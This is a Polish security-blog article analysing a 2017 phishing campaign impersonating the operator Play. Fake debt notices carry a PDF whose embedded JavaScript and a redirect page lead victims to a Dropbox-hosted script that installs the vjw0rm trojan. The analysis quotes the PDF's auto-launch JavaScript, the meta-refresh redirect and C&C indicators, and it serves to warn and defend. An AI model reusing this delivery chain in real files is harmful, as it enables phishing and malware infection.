Ciekawy, bo trochę nietypowy atak podszywający się pod firmę Play

dodał 4 maja 2017 o 13:55 w kategorii Złośniki  z tagami:
Ciekawy, bo trochę nietypowy atak podszywający się pod firmę Play

Do naszych Czytelników zaczęła dzisiaj docierać nowa kampania złośliwego oprogramowania. Z pozoru jest podobna do poprzednich, jednak atakujący zmienił mechanizmy dostarczenia niebezpiecznego kodu na wcześniej przez nas nieobserwowane.

Przyzwyczailiśmy się już do ataków, w których przestępcy podszywają się pod znane marki i pod dowolnym pretekstem do wiadomości dołączają plik zawierający złośliwe oprogramowanie lub link do niego prowadzący. Tym razem jednak nasz ulubiony polski przestępca, odpowiedzialny za większość kampanii tego typu w ciągu ostatniego pół roku, użył innej sztuczki by namówić użytkowników do pobrania i zainstalowania złośliwego pliku.

Niewinny PDF i zaległości w sieci Play

Wiadomość rozsyłana do Waszych skrzynek nosi temat „Play – Wezwanie do uregulowania należności” i wygląda następująco:

Zamiast zwyczajowej „faktury” mamy rzekome zaległości płatnicze. Co ciekawe, tym razem autor ataku w treści wiadomości wskazuje także numer rachunku, na który należy uregulować zaległości (dajcie znać, czy Playowi zdarza się to w emailach windykacyjnych). W wiadomości wskazany jest rachunek 18 1160 2244 8888 0100 3472 8828, którego śladów w sieci nie odnaleźliśmy.

Co ciekawe, do wiadomości dołączony jest adres, na który mają być wysyłane potwierdzenia jej przeczytania:

Disposition-Notification-To: play-potwierdzenia@2.pl

Oczywiście do wiadomości dodany jest załącznik – lecz nie jest to plik JavaScript ani nawet archiwum, a prawdziwy plik PDF o nazwie

Play Mobile - Wezwanie do uregulowania naleznosci.pdf

Plik ten (potencjalnie całkiem niewinny) po załadowaniu wygląda następująco:

W jego treści znaleźć zaś możemy następujący fragment:

/S /JavaScript
/JS (app.launchURL\('http://efakturaplay.pdns.stream/wezwanie-do-zaplaty/',true\);)
/Type /Action

Powoduje to, że po jego załadowaniu w czytniku PDFów (przynajmniej w domyślnej konfiguracji Adobe Readera) wywołane zostaje pobieranie pliku przez przeglądarkę. Przeglądarka wysyła żądanie do strony

http://efakturaplay.pdns.stream/wezwanie-do-zaplaty/

gdzie znajduje kod

<meta http-equiv="refresh"
content="0; url=https://www.dropbox.com/s/qr1icqs678qgxvf/Play_Mobile_-_Wezwanie_do_uregulowania_nale%C5%BCno%C5%9Bci%20PDF%20ssl.play.pl.js?dl=1">

Dzięki temu przeglądarka pobiera zawartość strony

https://www.dropbox.com/s/qr1icqs678qgxvf/Play_Mobile_-_Wezwanie_do_uregulowania_nale%C5%BCno%C5%9Bci%20PDF%20ssl.play.pl.js

i wyświetla na przykład takie oto okienko:

Jeśli ktoś zdecyduje się uruchomić plik JavaScript, to jego komputer zostanie zainfekowany koniem trojańskim vjw0rm.

Co ciekawe plik PDF o tej samej sumie funkcji skrótu był także dzisiaj wgrany do serwisu VirusTotal pod nazwą IP_VLAN_addresses.xlsx — skrót.lnk.pdf – może ktoś widział skojarzoną z nim wiadomość?

Charakterystyka ataku

Choć plik PDF i hosting na Dropboksie to nowiny u tego aktora, to niektóre punkty pozostają bez zmian:

  • emaile wysyłane z 149.56.201.93, tak samo jak w przypadku „faktur z Multimedia„,
  • domena efakturaplay.pdns.stream wskazuje na ten sam adres IP,
  • serwer C&C konia trojańskiego http://majcc.pdns.cz:1337/Vre jest łudząco podobny nazwą do kwieciencc.pdns.cz z ataku podszywającego się pod mBank,
  • vjw0rm używany jest praktycznie wyłącznie w analogicznych kampaniach.

Wygląda też na to, że w podobnej kampanii używana dzisiaj jest także domena email.pdns.download. Ciekawe, czy przestępca eksperymentuje z plikami PDF bo spada klikalność załączników, czy po prostu obudził się w nim duch innowatora?

Dziękujemy Czytelnikom, którzy podesłali próbki i Anonimowym Analitykom, którzy je przeanalizowali.